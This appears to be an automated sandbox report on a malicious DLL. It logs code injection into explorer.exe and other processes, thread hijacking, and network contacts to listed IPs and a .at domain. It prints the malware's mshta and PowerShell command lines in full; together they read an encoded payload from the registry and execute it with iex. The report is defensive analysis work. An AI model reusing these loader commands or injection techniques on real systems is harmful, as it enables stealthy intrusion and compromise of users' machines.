Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_032E00B5 mov ecx, dword ptr fs:[00000030h] 1_2_032E00B5
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_032E0DA5 mov eax, dword ptr fs:[00000030h] 1_2_032E0DA5
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_032E0695 mov eax, dword ptr fs:[00000030h] 1_2_032E0695
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F300B5 mov ecx, dword ptr fs:[00000030h] 3_2_00F300B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F30695 mov eax, dword ptr fs:[00000030h] 3_2_00F30695
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F30DA5 mov eax, dword ptr fs:[00000030h] 3_2_00F30DA5
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B38C50 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 1_2_04B38C50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059E8C50 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 3_2_059E8C50

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 61.98.7.132 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: giporedtrip.at
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 138.36.3.134 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 91.203.174.38 80 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\System32\loaddll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF783D812E0 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 2C0000 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF783D812E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF783D812E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 970000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF783D812E0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 5EE000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFD88E31580 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 2800000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFD88E31580 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 5F6000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFD88E31580 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: AA0000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFD88E31580 Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 5F0000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FFD88E31580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 2820000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 515ACFC000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF6D46D5FD0
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Allocates memory in foreign processes
Source: C:\Windows\System32\loaddll32.exe Memory allocated: C:\Windows\System32\control.exe base: 2C0000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\control.exe base: 970000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\explorer.exe base: 2820000 protect: page execute and read and write
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 5EE000 value: 00 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 7FFD88E31580 value: EB Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 2800000 value: 80 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 7FFD88E31580 value: 40 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 5F6000 value: 00 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 7FFD88E31580 value: EB Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: AA0000 value: 80 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 7FFD88E31580 value: 40 Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: PID: 3440 base: 5F0000 value: 00
Source: C:\Windows\System32\control.exe Memory written: PID: 3440 base: 7FFD88E31580 value: EB
Source: C:\Windows\System32\control.exe Memory written: PID: 3440 base: 2820000 value: 80
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\loaddll32.exe Thread register set: target process: 6104 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 4824 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3440 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3440 Jump to behavior
Source: C:\Windows\System32\control.exe Thread register set: target process: 3440
Source: C:\Windows\System32\control.exe Thread register set: target process: 3440
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 88E31580 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 88E31580 Jump to behavior
Source: C:\Windows\System32\control.exe Thread created: C:\Windows\explorer.exe EIP: 88E31580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 88E31580
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Wulb='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wulb).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name meewolqgy -value gp; new-alias -name wuuiocptps -value iex; wuuiocptps ([System.Text.Encoding]::ASCII.GetString((meewolqgy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Vn1t='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vn1t).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vxltksnx -value gp; new-alias -name fgyseccalw -value iex; fgyseccalw ([System.Text.Encoding]::ASCII.GetString((vxltksnx "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name meewolqgy -value gp; new-alias -name wuuiocptps -value iex; wuuiocptps ([System.Text.Encoding]::ASCII.GetString((meewolqgy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vxltksnx -value gp; new-alias -name fgyseccalw -value iex; fgyseccalw ([System.Text.Encoding]::ASCII.GetString((vxltksnx "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61ee6edf7de65.dll",#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name meewolqgy -value gp; new-alias -name wuuiocptps -value iex; wuuiocptps ([System.Text.Encoding]::ASCII.GetString((meewolqgy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hddjt5kh\hddjt5kh.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\32ysuxeg\32ysuxeg.cmdline Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vxltksnx -value gp; new-alias -name fgyseccalw -value iex; fgyseccalw ([System.Text.Encoding]::ASCII.GetString((vxltksnx "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qmanv25g\qmanv25g.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA9AF.tmp" "c:\Users\user\AppData\Local\Temp\hddjt5kh\CSCAC4C40391E0044BAAD217F7E1F4E48A.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC843.tmp" "c:\Users\user\AppData\Local\Temp\32ysuxeg\CSCDD69F677ABA1437DBA6EE4792C92D38A.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCEBB.tmp" "c:\Users\user\AppData\Local\Temp\qmanv25g\CSC83689403A124ABD8F80AE4A2C14BFB.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE6D7.tmp" "c:\Users\user\AppData\Local\Temp\vn3zgr4g\CSCD86376609B0744ABB56928FEBE923C3.TMP"
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: control.exe, 00000016.00000000.437382489.000002ACC3F70000.00000002.00020000.sdmp, control.exe, 00000016.00000000.444496558.000002ACC3F70000.00000002.00020000.sdmp, control.exe, 00000016.00000000.443269478.000002ACC3F70000.00000002.00020000.sdmp, control.exe, 00000016.00000000.441187484.000002ACC3F70000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.482689849.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 0000001A.00000000.468246857.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 0000001A.00000000.473914176.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.507953474.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 0000001A.00000000.475878410.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.447472597.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.467710961.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 0000001A.00000000.509648591.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 0000001A.00000000.485458840.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.447259484.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.484217961.0000000000EE0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.466334846.0000023ACC8C0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.460142395.0000023ACC8C0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.471108143.0000023ACC8C0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.468152266.0000023ACC8C0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.547965907.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.1077831706.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.535611624.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.632605904.0000021DB5F90000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: control.exe, 00000016.00000000.437382489.000002ACC3F70000.00000002.00020000.sdmp, control.exe, 00000016.00000000.444496558.000002ACC3F70000.00000002.00020000.sdmp, control.exe, 00000016.00000000.443269478.000002ACC3F70000.00000002.00020000.sdmp, control.exe, 00000016.00000000.441187484.000002ACC3F70000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.472519090.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 0000001A.00000000.446594195.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 0000001A.00000000.484290615.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 0000001A.00000000.473914176.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.475878410.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.483172538.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 0000001A.00000000.447472597.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.485458840.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.474448152.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 0000001A.00000000.447259484.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.484217961.0000000000EE0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.466334846.0000023ACC8C0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.460142395.0000023ACC8C0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.471108143.0000023ACC8C0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.468152266.0000023ACC8C0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.547965907.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.1077831706.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.535611624.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.632605904.0000021DB5F90000.00000002.00020000.sdmp Binary or memory string: Progman
Source: control.exe, 00000016.00000000.437382489.000002ACC3F70000.00000002.00020000.sdmp, control.exe, 00000016.00000000.444496558.000002ACC3F70000.00000002.00020000.sdmp, control.exe, 00000016.00000000.443269478.000002ACC3F70000.00000002.00020000.sdmp, control.exe, 00000016.00000000.441187484.000002ACC3F70000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.473914176.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.475878410.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.447472597.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.485458840.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.447259484.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.484217961.0000000000EE0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.466334846.0000023ACC8C0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.460142395.0000023ACC8C0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.471108143.0000023ACC8C0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.468152266.0000023ACC8C0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.547965907.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.1077831706.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.535611624.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.632605904.0000021DB5F90000.00000002.00020000.sdmp Binary or memory string: &Program Manager
Source: control.exe, 00000016.00000000.437382489.000002ACC3F70000.00000002.00020000.sdmp, control.exe, 00000016.00000000.444496558.000002ACC3F70000.00000002.00020000.sdmp, control.exe, 00000016.00000000.443269478.000002ACC3F70000.00000002.00020000.sdmp, control.exe, 00000016.00000000.441187484.000002ACC3F70000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.473914176.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.475878410.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.447472597.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.485458840.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.447259484.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.484217961.0000000000EE0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.466334846.0000023ACC8C0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.460142395.0000023ACC8C0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.471108143.0000023ACC8C0000.00000002.00020000.sdmp, control.exe, 0000001B.00000000.468152266.0000023ACC8C0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.547965907.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.1077831706.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.535611624.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000029.00000000.632605904.0000021DB5F90000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection
barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B474AD cpuid 1_2_04B474AD
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B3DB44 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 1_2_04B3DB44
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B39677 GetSystemTimeAsFileTime,HeapFree, 1_2_04B39677
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B495CA GetVersionExA,wsprintfA, 1_2_04B495CA
